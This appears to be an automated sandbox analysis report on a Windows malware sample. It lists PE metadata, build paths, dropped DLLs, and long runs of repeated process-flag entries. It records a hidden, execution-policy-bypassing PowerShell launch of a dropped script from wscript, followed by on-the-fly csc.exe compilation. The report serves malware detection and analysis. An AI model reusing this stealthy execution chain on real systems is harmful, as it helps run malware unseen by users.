                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: vp)[C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: explorer.exe, explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\winInfo.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, 00000000.00000002.2315556372.00007FF8A880A000.00000002.00000001.01000000.00000004.sdmp, winApps.dll.0.dr
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: section name: .gxfg
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: section name: .gehcont
                      Source: winApps.dll.0.drStatic PE information: section name: .gxfg
                      Source: winApps.dll.0.drStatic PE information: section name: .gehcont
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeFile created: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\spoxiyrj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\iczy5vwk.dllJump to dropped file
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
